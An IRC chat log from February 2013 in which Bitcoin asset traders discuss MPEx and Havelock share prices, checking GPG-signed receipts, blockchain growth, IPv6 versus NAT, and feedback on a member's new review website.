pushed) Feb 21 22:09:11 just trying to figure out a way to let others do mpex<-->havelock arbitrage automatically Feb 21 22:10:00 don't forget that people might not have correct formatting when copying their receipt. Feb 21 22:10:08 Namworld: then they are stupid Feb 21 22:10:10 :p Feb 21 22:10:15 if they dont format it right, it'll just reject it Feb 21 22:10:20 I have to clean up mines for the signature to become valid. Feb 21 22:10:21 topace just make sure somewhere in tyhere you actually check the sig is valid mpex. Feb 21 22:10:43 that will do the checking too. Feb 21 22:10:43 Because the windows command line doesn't display the same as MPEx return Feb 21 22:11:03 I must change spacings into actual tabs in notepad++ Feb 21 22:11:58 anyway, the auto-crediting of pushes is a very good idea Feb 21 22:12:00 copying the command line gives you spaces instead of tabs. Feb 21 22:12:20 will bridge situations where mopex price moves and you're not around quite nicely, plus it decentralizes. so ++. Feb 21 22:12:30 yup Feb 21 22:13:23 so to verify the sig is valid, AND is signed by mpex, im just looking for the DSA Key ID to match? Feb 21 22:13:29 gpg: Signature made Wed 20 Feb 2013 01:32:34 PM EST using DSA key ID F1B69921 Feb 21 22:14:02 gpg: Good signature from "MP Stock Exchange (Visit http://polimedia.us/bitcoin/) " Feb 21 22:15:53 so im just looking for a) "DSA Key ID F1B69921" and b) "Good signature" Feb 21 22:15:59 [MPEX] [S.MPOE] 14379 @ 0.00063467 = 9.1259 BTC [+] Feb 21 22:17:56 topace yeah Feb 21 22:18:10 if it says it's a good signature by MPEx key you're golden. Feb 21 22:18:22 also, make sure you read this : http://trilema.com/2013/new-mpex-key/ Feb 21 22:19:13 Namworld is that a /n vs /r/n issue ? Feb 21 22:19:52 Namworld: will you be around tonight? Feb 21 22:19:57 ahh switching your key eh? Feb 21 22:21:14 well it expires Feb 21 22:22:30 so as im writing this, i should accept both F1B69921 and CFE0F3E1 that way things wont break because i forget to change my end on March 10th :p Feb 21 22:22:44 thestringpuller: is there some event happening or you'll just need me for something? Feb 21 22:25:09 topace prolly should at least keep[ an eye for new key. Feb 21 22:25:18 implementation details left to the exchange owner :) Feb 21 22:26:28 indeed :) thanks.. this is gonna be awesome :) Feb 21 22:28:28 :) Feb 21 22:32:31 !tickr m s.dice Feb 21 22:32:38 !ticker m s.dice Feb 21 22:32:40 [MPEX:S.DICE] 1D: 0.00562811 / 0.0060087 / 0.00609 (40513 shares, 243.43 BTC), 7D: 0.00562811 / 0.00635651 / 0.0069 (1414456 shares, 8,991.00 BTC), 30D: 0.00085848 / 0.00592989 / 0.0075 (7769457 shares, 46,072.05 BTC) Feb 21 22:34:38 [MPEX] [S.MPOE] 2150 @ 0.00063544 = 1.3662 BTC [+] Feb 21 22:39:02 SCAMMER Feb 21 22:39:04 :) Feb 21 22:42:21 He doesn't like walls that compete with his sale offers maybe? =P Feb 21 22:44:22 nothing to do with the threat of unannounced dumping by the issuer? Feb 21 22:44:48 ^ Feb 21 22:47:10 Deadterra, I was joking about an earlier complaint from dub Feb 21 22:47:24 he doesn't like that you control your own passthru Feb 21 22:47:34 I didn't say its a scam, just a shitty investment Feb 21 22:47:47 sounds more like he doesn't like unannounced dumping. Feb 21 22:48:17 i take unannounced dumps all the time, just not on other people. Feb 21 22:48:21 yes and any sane investors unfomfortability Feb 21 22:48:21 dub: http://lmgtfy.com/?q=what+is+a+joke Feb 21 22:48:58 later! Feb 21 22:55:14 [MPEX] [S.MPOE] 4821 @ 0.00063467 = 3.0597 BTC [-] Feb 21 22:55:45 if you are actively arbing then the price stays more realistic anyway Feb 21 22:56:10 i think dub's soreness stems from erik's 3mil share dump Feb 21 22:56:41 probably waiting for shares to reach .0075 again Feb 21 22:59:28 so this is lookin fleasible now http://bitbet.us/bet/113/bitbet-will-we-worth-more-than-satoshi-dice/ Feb 21 22:59:33 hihi. Feb 21 23:02:24 I think ThickAsThieves is getting defensive about his investments Feb 21 23:06:43 dub, i'm invested all over the place Feb 21 23:06:50 it's all good Feb 21 23:08:53 all money made from investing Feb 21 23:09:29 kako, we'll see hot bbet divs look next then ;) Feb 21 23:09:34 hot=how Feb 21 23:11:13 My MPEx PTs on BTCT.co are 225% better than other MPEx PTs according to flawed studies I sponsored... Feb 21 23:16:39 I guess the volumes are OK Feb 21 23:17:14 We have comparable volume for S.DICE on BTCT.co Feb 21 23:17:34 not monthly tho Feb 21 23:19:03 aye Feb 21 23:19:54 anyone here have lawyers at their disposal? Feb 21 23:21:07 I'm off for lunch Feb 21 23:27:32 [MPEX] [S.MPOE] 6079 @ 0.00063169 = 3.84 BTC [-] Feb 21 23:32:07 !ticker h sdice Feb 21 23:32:09 [HAVELOCK:SDICE] 1D: 0.69900000 / 0.7085 / 0.71800000 (2 shares, 1.41700000 BTC), 7D: 0.66000000 / 0.70371784 / 0.75900000 (1380 shares, 971.13062090 BTC), 30D: 0.44000000 / 0.6615484 / 0.89000000 (11276 shares, 7459.61979386 BTC) Feb 21 23:32:14 havelock has pretty good sdice volume Feb 21 23:32:25 not today though :p lol Feb 21 23:32:28 [HAVELOCK] [SDICE] 3 @ 0.69 = 2.07 BTC [-] Feb 21 23:40:49 [BTCTC] [S.MPOE-PT] 1 @ 0.00065 BTC [+] Feb 21 23:46:51 [MPEX] [S.MPOE] 2171 @ 0.00063544 = 1.3795 BTC [+] Feb 21 23:46:53 [MPEX] [S.MPOE] 16949 @ 0.00063548 = 10.7708 BTC [+] Feb 21 23:49:37 [MPEX] [S.MPOE] 3300 @ 0.00063548 = 2.0971 BTC [+] Feb 21 23:55:48 [MPEX] [S.MPOE] 989 @ 0.00063274 = 0.6258 BTC [-] Feb 21 23:56:09 "Seems like a huge risk to both sides with so many assets." Feb 21 23:56:55 so, some vocal members want to small block size as a leverage to get off-blockchain methods developed quicker Feb 21 23:56:59 Can someone explain me how having 1 passthrough for each MPEx stock suddenly makes more risk appear out of thin air than if I had only one? Feb 21 23:58:00 I don't get the why of that anonymous' vote Feb 22 00:02:37 [MPEX] [S.MPOE] 4321 @ 0.00063173 = 2.7297 BTC [-] Feb 22 00:02:41 [MPEX] [S.MPOE] 15289 @ 0.00063188 = 9.6608 BTC [+] Feb 22 00:02:43 [MPEX] [S.MPOE] 893 @ 0.00063548 = 0.5675 BTC [+] Feb 22 00:06:55 [MPEX] [S.MPOE] 4800 @ 0.00063072 = 3.0275 BTC [-] Feb 22 00:06:57 [MPEX] [S.MPOE] 2140 @ 0.00063036 = 1.349 BTC [-] Feb 22 00:16:47 [MPEX] [S.MPOE] 743 @ 0.00063548 = 0.4722 BTC [+] Feb 22 00:16:49 [MPEX] [S.MPOE] 16000 @ 0.00063598 = 10.1757 BTC [+] Feb 22 00:16:52 [MPEX] [S.MPOE] 2073 @ 0.00063599 = 1.3184 BTC [+] Feb 22 00:18:33 [MPEX] [S.MPOE] 2181 @ 0.00063036 = 1.3748 BTC [-] Feb 22 00:18:35 [MPEX] [S.MPOE] 13805 @ 0.00063036 = 8.7021 BTC [-] Feb 22 00:28:35 s.dice is currently up 10162 BTC for the month, not bad Feb 22 00:28:45 ;;calc 0.00010162 / 0.00597198 Feb 22 00:28:45 0.0170161320031 Feb 22 00:28:55 yields 1.7% per month at current price Feb 22 00:29:19 what other bitcoin stock performs like that and isn't a scam? Feb 22 00:31:01 [MPEX] [S.MPOE] 2195 @ 0.00063036 = 1.3836 BTC [-] Feb 22 00:31:05 [MPEX] [S.MPOE] 4321 @ 0.00063036 = 2.7238 BTC [-] Feb 22 00:31:07 [MPEX] [S.MPOE] 13805 @ 0.00063036 = 8.7021 BTC [-] Feb 22 00:31:10 [MPEX] [S.MPOE] 7729 @ 0.00063035 = 4.872 BTC [-] Feb 22 00:31:15 BTC-BOND pays almost 1% per month Feb 22 00:37:36 ;;ticker Feb 22 00:37:36 BTCUSD ticker | Best bid: 29.80001, Best ask: 29.86000, Bid-ask spread: 0.05999, Last trade: 29.86000, 24 hour volume: 33027.28505548, 24 hour low: 29.31100, 24 hour high: 29.97800, 24 hour vwap: 29.67916 Feb 22 00:37:53 is there a command to get gox lag? Feb 22 00:38:41 ;;goxlag Feb 22 00:38:42 0 seconds Feb 22 00:38:51 thank u, iz Feb 22 00:38:54 np Feb 22 00:38:58 How a bitcoin technical question inevitably goes political: https://bitcointalk.org/index.php?topic=144895.0 Feb 22 00:39:29 funny how one can get psyched about it Feb 22 00:39:35 christ, 17 pages on that post already? Feb 22 00:39:44 i saw it start and just ignored it Feb 22 00:39:49 seems like the right call Feb 22 00:40:32 [MPEX] [S.MPOE] 4167 @ 0.00063036 = 2.6267 BTC [+] Feb 22 00:40:39 well, it shouldn't worry me as a prospective btc banker at all Feb 22 00:41:02 but i just don't like having 1M limit and transactions with $20 fees Feb 22 00:41:16 as some "members" imagine Feb 22 00:41:57 [MPEX] [S.MPOE] 3600 @ 0.00063036 = 2.2693 BTC [+] Feb 22 00:42:01 cause they want to play with their nebulous off-blockchain schemes Feb 22 00:42:47 they even propose to get funding from bitcoin foundation for it Feb 22 00:43:10 as if it was more important than improving the BTC protocol itself Feb 22 00:44:20 makes me wanna spam the blockchain Feb 22 00:44:26 they even told me that instead of having IPv4 with 64bit addresses proper and thus avoiding NAT, Feb 22 00:44:36 IPv6 should have come sooner? Feb 22 00:46:16 kako, we should just join btc foundation and introduce some healthy reason there Feb 22 00:47:06 fortunately gavin has his wit together, but he seems alone Feb 22 00:47:37 hrm Feb 22 00:48:22 fortunately gavin has his wit together, but he seems alone << this. Feb 22 00:48:48 being the bitcoin lead developer is part time kindergarten headmaster. Feb 22 00:52:48 sauce: http://bitcoinstats.com/irc/bitcoin-dev/logs/2013/02/21#l5998176 Feb 22 00:53:38 ^ unlike btctalk, peeps are quite intelligent, you may find it bearable to read it Feb 22 00:56:06 phantomcircuit 1GiB blocks doesn't seem... practical Feb 22 00:56:08 yeah Feb 22 00:56:15 well no difference on the end Feb 22 00:56:24 if its 10 blocks 1 gig or 1 10 gig Feb 22 00:56:44 you can have n blocks in a minute Feb 22 00:56:55 so not really a fix Feb 22 00:58:35 [MPEX] [S.DICE] 1250 @ 0.00587398 = 7.3425 BTC [-] Feb 22 00:59:20 [MPEX] [S.MPOE] 4321 @ 0.00063579 = 2.7472 BTC [+] Feb 22 00:59:22 [MPEX] [S.MPOE] 7900 @ 0.00063597 = 5.0242 BTC [+] Feb 22 00:59:23 [MPEX] [S.MPOE] 13805 @ 0.00063598 = 8.7797 BTC [+] Feb 22 00:59:25 [MPEX] [S.MPOE] 10661 @ 0.00063599 = 6.7803 BTC [+] Feb 22 00:59:26 [MPEX] [S.MPOE] 3263 @ 0.00063654 = 2.077 BTC [+] Feb 22 01:02:28 [HAVELOCK] [KCIM] 1 @ 0.99 BTC [+] Feb 22 01:02:53 blockchain takes up 7.6GB on my pc. Feb 22 01:03:11 don't you have terabyte hdd? Feb 22 01:03:28 no, that's diablo, I have a 500gb and 60gb ssd Feb 22 01:03:35 coupel of externals if I need Feb 22 01:03:52 I get the best bang for the buck, and older drives are sellig cheap Feb 22 01:04:17 would like to upgrade my ssd, but I'm not sure the OS will reinstall correctly on the the ssd. Feb 22 01:04:40 Do you know if remastersys is a true ISO installation after you create it? Feb 22 01:04:45 or does it retain partitions? Feb 22 01:04:52 nevermind, that's for #linux Feb 22 01:04:54 brg Feb 22 01:04:56 I dont have a 1tb hd Feb 22 01:04:56 brb Feb 22 01:05:03 you have 2tb Feb 22 01:05:10 lol Feb 22 01:05:13 I have 2 400gb in raid 1, 4x750 in raid 5, and thats now being switched over to 2x2tb raid 1 and Ill have 2 spare 750s Feb 22 01:05:23 send me a 750 Feb 22 01:05:25 and btw, are you on 0.8.0? Feb 22 01:05:34 you have two copies of the chain Feb 22 01:05:37 one leveldb, one bdb Feb 22 01:05:50 i have one 1.5TB 5400rpm "WD Green" and two bitcoinds happily on top of it Feb 22 01:05:51 you dont need the other one anymore Feb 22 01:05:53 crikey, does that mean 14gb of blockchain? Feb 22 01:06:00 oh, I have two copies now? Feb 22 01:06:07 DeadWeasel: no, the blockchain isnt that big to begin with Feb 22 01:06:23 why did I have 7.6 gb in my bitcoin qt directory? Feb 22 01:06:24 okay I lied Feb 22 01:06:27 [HAVELOCK] [SDICE] 2 @ 0.68 = 1.36 BTC [-] Feb 22 01:06:30 apparently the chain IS 7.3gb now Feb 22 01:06:34 what the fuck Feb 22 01:06:35 damn Feb 22 01:06:37 yeah Feb 22 01:06:37 $ du -sh .bitcoin Feb 22 01:06:40 7.3G .bitcoin Feb 22 01:06:44 when the fuck did that happen Feb 22 01:06:47 i uninstalled that shit, I had to do a backup Feb 22 01:06:55 i'll get it back later, thinking of multibit Feb 22 01:06:55 while you were playing satoshidice Feb 22 01:06:56 it was only like 3gb a month or tow ago Feb 22 01:06:59 anyone used that? Feb 22 01:07:10 jurov: I hate SD Feb 22 01:07:11 also on a side note, funny, i remember people saying "we are paying banks to hold a number in a db, ridiculus, use btc, be your own bank" Feb 22 01:07:13 its bloating the chain with trash Feb 22 01:07:14 well there ya go. Feb 22 01:07:16 mo transactions, mo problems... Feb 22 01:07:30 I wish I was friedcat Feb 22 01:07:32 SD is doing that. Feb 22 01:07:33 I'd solo mine and refuse tx for SD Feb 22 01:07:46 but what options is there? it's an economy. Feb 22 01:07:57 what do you solo mine with? Feb 22 01:08:03 what are you all on? i'll happily accept 1TB blockchain.. its still little price for btc freedom Feb 22 01:08:32 DeadWeasel: I dont solo anything, I use p2pool Feb 22 01:08:42 oh, i saw that wrong Feb 22 01:08:42 you really want btc to be usable off a floppy with 1200 baud connection? Feb 22 01:08:48 jurov: becuase if SD keeps continuing at this rate, thats 1GB a year Feb 22 01:08:52 that would be hilarious. Feb 22 01:09:06 1GB an year, go on! Feb 22 01:09:15 my commodore 64 hashing the blockchain. 1 block every 15 years Feb 22 01:09:41 we can manage 1TB a year, it's 2013! Feb 22 01:09:53 someone is stuck in 1990's Feb 22 01:09:57 it's true, storage technology is keeping pace Feb 22 01:09:57 I got a 32gb flash drive for 9 bucks Feb 22 01:10:01 where? Feb 22 01:10:13 jborkl^ Feb 22 01:10:26 you keep your cold wallet on there? Feb 22 01:10:28 with my external hdd, a coupon extra from best buy Feb 22 01:10:32 nice Feb 22 01:10:39 storage is cheap Feb 22 01:10:42 it is. Feb 22 01:10:46 i just don't need anymore. Feb 22 01:11:06 i've got all of 170GB including OS and video/music/docs/dev stuff Feb 22 01:11:14 lean mean machine Feb 22 01:11:33 but I'll glady take a 32GB key for $9 Feb 22 01:11:55 I feel like there is a manipulator keepng the price just under 30 right now Feb 22 01:12:12 for the weekend, then use the lemmings and his own power to push past 30.31.32 Feb 22 01:12:18 ;;ticker Feb 22 01:12:19 BTCUSD ticker | Best bid: 29.78090, Best ask: 29.89999, Bid-ask spread: 0.11909, Last trade: 29.90999, 24 hour volume: 32622.24662481, 24 hour low: 29.31100, 24 hour high: 29.97800, 24 hour vwap: 29.67901 Feb 22 01:12:19 then dump again Feb 22 01:12:28 volume dropping for the evening it seems? Feb 22 01:13:25 jurov: http://marc.info/?l=openbsd-misc&m=135110703125929&w=2 Feb 22 01:14:00 coingenuity: you there? Feb 22 01:14:21 Im thinking about selling my 100btc Feb 22 01:14:22 why is my invoice from Cheyanne Wyoming, but you say you are all sleeping as if you ar eon the other side of the world? Feb 22 01:14:24 and buy some shit I want Feb 22 01:14:39 Diablo-D3: I feel you. Feb 22 01:14:41 midnightmagic, what do you meant? Feb 22 01:14:56 I sold to cover my investment, so my money is out, my other 150BTC is all profit if I sell Feb 22 01:15:00 but I don't know what to do Feb 22 01:15:30 DeadWeasel: yes? Feb 22 01:15:39 what's cooking Feb 22 01:16:04 DeadWeasel: people will probably bitch that Im stealing from dmc, but I dont give two fucks Feb 22 01:16:08 its my money, and the money didnt come from dmc Feb 22 01:16:13 so they can suck my nuts Feb 22 01:16:14 coingenuity: Cheyanne WY Feb 22 01:16:20 but you all sleep during the day? Feb 22 01:16:24 no? Feb 22 01:17:01 jurov: What do you mean, what do I mean? I'm not trying to argue or anything, I'm just saying IPv6 kinda sucks for what it's become, and I'm not surprised at all it's not installed everywhere right now. Feb 22 01:17:01 Weird, you said you were all sleeping when I sent my emails. I'm just making sure my shipments is coming from outside the US Feb 22 01:17:13 BTW, thank you for INVOICE, makes my taxes much easier Feb 22 01:17:15 you da man Feb 22 01:17:42 and for putting up with me. I will likely work with you again. Also, if you have a particular area you need a review in, let me know. Feb 22 01:17:43 NP, that's why i made it that way(with a lot of USD numeracy) :D Feb 22 01:18:07 your order comes from the USA, but we ship worldwide with no issues excepting some rare countries Feb 22 01:18:24 and with special customs forms to make sure you don't get charged taxes, if that is the case in your country Feb 22 01:18:27 I see, that bitctalk thread was worrisome, felt as if it wsa coming ex-USA. Feb 22 01:18:35 you might want to clarify on that thread that you are US based. Feb 22 01:18:35 midnightmagic, i see, but it's not so obvious. you could have meant something "ipv6 needs nat too" :) Feb 22 01:18:53 what's wrong with nat anyway ? Feb 22 01:18:56 fuck nat and fuck those people that want ipv6 nat Feb 22 01:18:57 Also, never found anything in my spam. So gmail might be filtering on a higher level. Feb 22 01:19:02 o.o Feb 22 01:19:02 shitty. Feb 22 01:19:16 DeadWeasel: we're pretty verbose about it, not sure why people get a different impression, but yeah- always ship from the usa, no matter what Feb 22 01:19:20 fuck IPV6 altogether, the protocol is still shit Feb 22 01:19:39 DeadWeasel: even set up our distribution network such that we're close to the biggest airports in the world for expedited global processing ;) Feb 22 01:19:55 but yeah, i agree= it looks like a high-level filter to me Feb 22 01:19:57 coingenuity: that's awesome. The most recent thread doesn't make that clear, and new customers will find that first. Feb 22 01:20:06 I will update that thread since you've worked so closely with me. Feb 22 01:20:12 mircea_popescu behind nat you are second class net citizen...just cuz some dumbass misallocated the bits Feb 22 01:20:39 DeadWeasel: thanks, we do our best to be communicative despite being a small company with people working 20 hour days, lmao Feb 22 01:20:41 jurov i don't get it ? Feb 22 01:21:44 you share ip address with other users and nobody can connect to your computer directly, you have to initiate the connection or it has to involve third party Feb 22 01:22:09 the fact that nobody can connect directly to my terminal is perfect. Feb 22 01:22:13 why should they, why would they. Feb 22 01:22:19 mircea_popescu: but i want to! Feb 22 01:22:21 >.> Feb 22 01:22:34 and i don't share the connection at all. i own the ip ranges and i use nat routers pretty much everwhere Feb 22 01:22:36 mircea_popescu, firewall is for that purpose Feb 22 01:22:38 lol coingenuity Feb 22 01:23:02 mircea_popescu i pay 4 euros/mo for ip addy Feb 22 01:23:03 jurov i trust a router more than some software solution. Feb 22 01:23:08 it's normal around Feb 22 01:23:13 [MPEX] [S.MPOE] 4321 @ 0.00063433 = 2.7409 BTC [-] Feb 22 01:23:14 [MPEX] [S.MPOE] 4579 @ 0.00063402 = 2.9032 BTC [-] Feb 22 01:23:36 firewall can be dedicated, too Feb 22 01:23:46 [MPEX] [S.MPOE] 449 @ 0.00063654 = 0.2858 BTC [+] Feb 22 01:23:48 [MPEX] [S.MPOE] 4321 @ 0.00063688 = 2.752 BTC [+] Feb 22 01:23:49 [MPEX] [S.MPOE] 7030 @ 0.00063688 = 4.4773 BTC [+] Feb 22 01:23:58 and i really hope your router isn't $10 crap if you trust it so much Feb 22 01:24:00 well sure. but a router is an inexpensive, widely available, easily deployable well specified item Feb 22 01:24:06 it's perfect, i don't see whythe hate. Feb 22 01:24:46 nothing wrong with routers, for routing. Feb 22 01:25:52 it's like... when i got my first non-dialup connection (by putting computer with wificard to attic and scanning the ether lol) Feb 22 01:25:58 well sure, as a solution to the ip limit problem they're kludgy Feb 22 01:26:06 it was fascinating i can put anything on the computer Feb 22 01:26:19 and anyone in the world can come and see it, use it Feb 22 01:26:24 just, freedom Feb 22 01:26:35 ya well. Feb 22 01:26:36 behing nat you cant do it Feb 22 01:26:44 i don't want to do it. Feb 22 01:26:54 and i specifically get non-wireless routers at that. Feb 22 01:27:06 cuz you can pay $$ to get the server elsewhere Feb 22 01:27:09 the isp ppl were looking at me like i was a talking bear or something Feb 22 01:27:32 my crazy ideas like public linux shell server aren't welcome at any hosting Feb 22 01:27:53 at least not like at such price it earns Feb 22 01:27:54 well wtf, why run a public shell Feb 22 01:28:33 just for fun... and being able to do stuff from behind comapny firewall Feb 22 01:28:41 that doesn't allow ssh Feb 22 01:29:08 what is this, the semi competent half serious hacker ? Feb 22 01:29:57 [MPEX] [S.DICE] 2000 @ 0.00587398 = 11.748 BTC [-] Feb 22 01:30:02 okay, you play elsewhere Feb 22 01:31:27 [MPEX] [S.MPOE] 4321 @ 0.00063679 = 2.7516 BTC [-] Feb 22 01:31:29 [MPEX] [S.MPOE] 5679 @ 0.00063688 = 3.6168 BTC [+] Feb 22 01:32:44 and you know any "fully competent" and "serious" hackers? Feb 22 01:33:30 yes. also pornstars, escorts, dope dealers, politicians, investors, actresses and rockstars. Feb 22 01:34:31 and were they so competent and serious in their 20s, too? Feb 22 01:34:54 heck, even 30s. lol Feb 22 01:35:01 actually most hackers give up hacking by the time they're 30 Feb 22 01:35:13 move on to more respectable endeavours like playing games and shit. Feb 22 01:36:08 [MPEX] [S.MPOE] 3158 @ 0.00063688 = 2.0113 BTC [+] Feb 22 01:36:10 [MPEX] [S.MPOE] 10058 @ 0.00063689 = 6.4058 BTC [+] Feb 22 01:37:29 jurov: Nope. I made a comment about it while you were talking with petertodd but I think it was lost in the scrollback. Feb 22 01:37:44 ah now i remember Feb 22 01:39:09 but i think wherther ipv6 is good or not, was besides the point Feb 22 01:39:43 the point is, to allow extending capacity currently well working thing while it is possible Feb 22 01:41:21 otherwise kludgy hacks ensue Feb 22 01:41:27 anybody have any ideas for my shit site I put up with no original content? http://zeroconfirmations.com Feb 22 01:42:16 I figure i could review all my dealings with bitocin related businesses Feb 22 01:42:24 or something Feb 22 01:42:35 help a brotha out with ideas Feb 22 01:43:02 bitcoin business reviews would not be bad Feb 22 01:43:09 DeadWeasel: fake quote alert on the ben franklin Feb 22 01:43:18 haha thanks pigeons Feb 22 01:43:23 you never know with that shit Feb 22 01:43:27 how did you know? Feb 22 01:43:37 i'll deal with it later. Feb 22 01:43:59 the Woman is yelling at me. Send me Ideas, they stored in the log Feb 22 01:44:11 cause its the declaration of independence not the constitution that mentions "pursuit of happiness (property)" Feb 22 01:44:53 well, really cause he never said that Feb 22 01:48:03 quote Linus Torvalds instead: Bitcoin is user friendly. It just chooses who his friends are. Feb 22 01:51:34 DeadWeasel, you can change anon to pseudonymous to be more correct Feb 22 01:52:06 or "He Who Shall Not Be Named" Feb 22 01:52:10 DeadWeasel and id put drugs on that list on the last place if needs to be Feb 22 01:52:54 and third row should be "Virtual Private Shows" Feb 22 01:53:48 I have two minutes, those are all awesome suggestions and will be fixed Feb 22 01:54:00 ;;ticker Feb 22 01:54:00 BTCUSD ticker | Best bid: 29.80009, Best ask: 29.80010, Bid-ask spread: 0.00001, Last trade: 29.80000, 24 hour volume: 34766.89802243, 24 hour low: 29.31100, 24 hour high: 29.97800, 24 hour vwap: 29.68182 Feb 22 01:54:26 awesome stuff. I put this together in two hours with no idea for content. The first paragraph is too preachy I think Feb 22 01:54:40 tldr Feb 22 01:54:48 I'll reorder and word much. It won't go truly live until I have some content Feb 22 01:54:51 Namworld: where you at? Feb 22 01:54:53 but I wanted ya'll input Feb 22 01:54:56 thank you! Feb 22 01:55:10 pigeons, good to know, thx Feb 22 01:55:33 and you forgot bitcoin investments completely Feb 22 01:55:36 so I'll stick to the reviews Idea Feb 22 01:55:48 being on #bitcoin-assets, quite weird :) Feb 22 01:55:50 I'll review investments as I try them Feb 22 01:55:59 bitfunder is my only experience Feb 22 01:56:05 i'm not an mpex high roller Feb 22 01:56:11 just a peon Feb 22 01:56:28 you can try coinbr, i have some tips for bugs Feb 22 01:56:29 yeah #bitcoin-assets got its own page, its just not public yet Feb 22 01:56:34 i'll go through this log after dinner and make adjustments. This is great stuff. Feb 22 01:56:44 so you can write scathing review Feb 22 01:56:52 jurov: thanks! hahaha, you can let me know Feb 22 01:56:59 I'll have to sort out comments Feb 22 01:57:19 gotta roll before lady get's mad. Feb 22 01:57:35 domesticate her differently. Feb 22 01:57:45 oh, you're here instead in bed with wife? good lad Feb 22 02:01:21 [MPEX] [S.MPOE] 16900 @ 0.00063673 = 10.7607 BTC [-] Feb 22 02:01:23 [MPEX] [S.MPOE] 5000 @ 0.00063411 = 3.1706 BTC [-] Feb 22 02:01:27 [MPEX] [S.MPOE] 364 @ 0.00063403 = 0.2308 BTC [-] Feb 22 02:02:31 [MPEX] [S.DICE] 500 @ 0.00584883 = 2.9244 BTC [-] Feb 22 02:02:33 [MPEX] [S.DICE] 300 @ 0.00584883 = 1.7546 BTC [-] Feb 22 02:02:37 [MPEX] [S.DICE] 500 @ 0.00584882 = 2.9244 BTC [-] Feb 22 02:07:03 hey all, how goes it? Feb 22 02:08:56 kakobrekla I've seen a few mentions of LTC-GLOBAL here. I didn't really think there would be, but if there's interest in tying that in for trading I'm happy to. Feb 22 02:09:10 could probably convert to btc on the fly or something if that made more sense. Feb 22 02:09:30 with assbot that is Feb 22 02:09:34 18:35 < mircea_popescu> actually most hackers give up hacking by the time they're 30 Feb 22 02:10:16 18:35 < mircea_popescu> actually most hackers give up hacking by the time they're 30 << http://24.media.tumblr.com/9a38d3e2ad6140232d68005eaa93409f/tumblr_mfr20sz41o1rmoufuo1_500.gif Feb 22 02:13:14 [MPEX] [S.MPOE] 5900 @ 0.00063689 = 3.7577 BTC [+] Feb 22 02:17:37 [MPEX] [S.MPOE] 4321 @ 0.00063415 = 2.7402 BTC [-] Feb 22 02:17:39 [MPEX] [S.MPOE] 10044 @ 0.00063403 = 6.3682 BTC [-] Feb 22 02:17:41 [MPEX] [S.MPOE] 3507 @ 0.00063402 = 2.2235 BTC [-] Feb 22 02:20:34 so any idea why dice tanked? Feb 22 02:22:41 its tanking? Feb 22 02:23:05 no Feb 22 02:23:23 down a little today Feb 22 02:24:28 kinda far from .73 Feb 22 02:25:15 I bought in right before the big 2 mil sale, heh. couldn't have timed it worse. Feb 22 02:26:27 that whale is gonna have to work lots of hours at mcdicks Feb 22 02:26:35 to make up for his 37k btc loss Feb 22 02:26:57 Just one million Feb 22 02:26:59 maybe sleep in a cot in the corner Feb 22 02:27:22 That guy probably had the most fun of his life gambling. His 1 million lasted quite a long time for many bets Feb 22 02:27:51 he still has around 3k left Feb 22 02:27:58 i wonder why hed stop Feb 22 02:28:53 He's waiting for his 3k to be worth 1 million Feb 22 02:29:04 xD Feb 22 02:29:09 might not be all that long. heh Feb 22 02:30:07 he'd be better if he just sat with his 40k Feb 22 02:30:08 lol Feb 22 02:30:30 http://bitbet.us/bet/7/bfl-will-deliver-asic-devices-before-march-1st/ Feb 22 02:30:33 It closed now Feb 22 02:30:41 900 vs 800 BTC Feb 22 02:30:46 I hope the 900 wins Feb 22 02:32:05 [BTCTC] [S.MPOE-PT] 6 @ 0.00065 = 0.0039 BTC [+] Feb 22 02:33:26 I hope people buy more of these PT of mine Feb 22 02:34:06 I need to cycle selling and buying more. Reach a worthwhile outstanding amount. Feb 22 02:35:21 jurov: VPS, virutal private shows? Feb 22 02:35:35 jurov: you mean cams? Feb 22 02:35:39 you pulling my chain Feb 22 02:35:40 ? Feb 22 02:36:26 Oh hoh ho Feb 22 02:36:29 Sticky: 20 - 31 cm of snow is enough to paralyse bfl.location Feb 22 02:38:59 DeadWeasel, what? Feb 22 02:40:07 he's giving me feedback on a total shit site I just jammed up on an EC2 server. Feb 22 02:47:10 ah Feb 22 02:49:07 [MPEX] [S.MPOE] 4321 @ 0.00063601 = 2.7482 BTC [+] Feb 22 02:49:10 [MPEX] [S.MPOE] 22479 @ 0.00063596 = 14.2957 BTC [-] Feb 22 02:52:46 Namworld: Feb 22 02:52:48 i msged you Feb 22 02:52:52 [MPEX] [S.MPOE] 2971 @ 0.00063596 = 1.8894 BTC [-] Feb 22 02:52:54 [MPEX] [S.MPOE] 13229 @ 0.00063402 = 8.3875 BTC [-] Feb 22 03:04:56 here are my updates: http://54.235.171.204/zero.html Feb 22 03:05:12 [MPEX] [S.MPOE] 4142 @ 0.00063689 = 2.638 BTC [+] Feb 22 03:06:37 Namworld: , kakobrekla , pigeons http://54.235.171.204/zero.html Feb 22 03:06:40 Ukto: who are these guys? https://bitfunder.com/asset/ASIC.COOP Feb 22 03:08:48 usagi: give me input if you have time http://54.235.171.204/zero.html Feb 22 03:09:19 usagi: I DON"T KNOW Feb 22 03:09:26 looks a bit dodgy pigeons Feb 22 03:09:32 i wouldn't buy any :/ Feb 22 03:09:45 usagi: I think i will mostly do reviews of services I've used Feb 22 03:09:53 and continue to use. become the angies list of bitcoin services Feb 22 03:09:58 my idea anyway Feb 22 03:10:11 ASIC.COOP owns a 3 BitForce Single SC order. The order date is July 14th 2012. - and they want 1btc a share? Feb 22 03:10:12 reputation based currency, reputation directory Feb 22 03:10:14 are they serious? Feb 22 03:10:22 hahahahaha, asic.coop Feb 22 03:10:26 BS Feb 22 03:10:27 DeadWeasel: check out stuffexists.com for inspiration on angies list type thing. needs updating though Feb 22 03:10:34 thanks! Feb 22 03:12:01 pigeons: that is a huge resource. gracias! Feb 22 03:15:59 yeah but they suck... Feb 22 03:16:03 deadweasel, I'd be interested in a review of btct.co Feb 22 03:16:41 if you've used the other exchanges a bit, I'm always looking for ways to improve. Feb 22 03:17:29 Only bitfunder and setup an account on btct.co Feb 22 03:17:40 it would take me a week, since I ahve a full time job. Feb 22 03:17:56 But I am going with the review angle. Just got ot sort it out. and the rest of the HTML Feb 22 03:18:10 burnside: ^^ Feb 22 03:18:25 usagi: I'll check it out, add it to the list Feb 22 03:18:31 sounds great, let me know what you come up with. Feb 22 03:18:36 definitely check out cryptostocks too Feb 22 03:18:42 and coinbr.com Feb 22 03:18:54 it's on my to do list now. Feb 22 03:19:56 usagi I think everyone has quality control issues. it's a huge challenge for all the exchanges. Feb 22 03:20:14 ;;bc,stats Feb 22 03:20:16 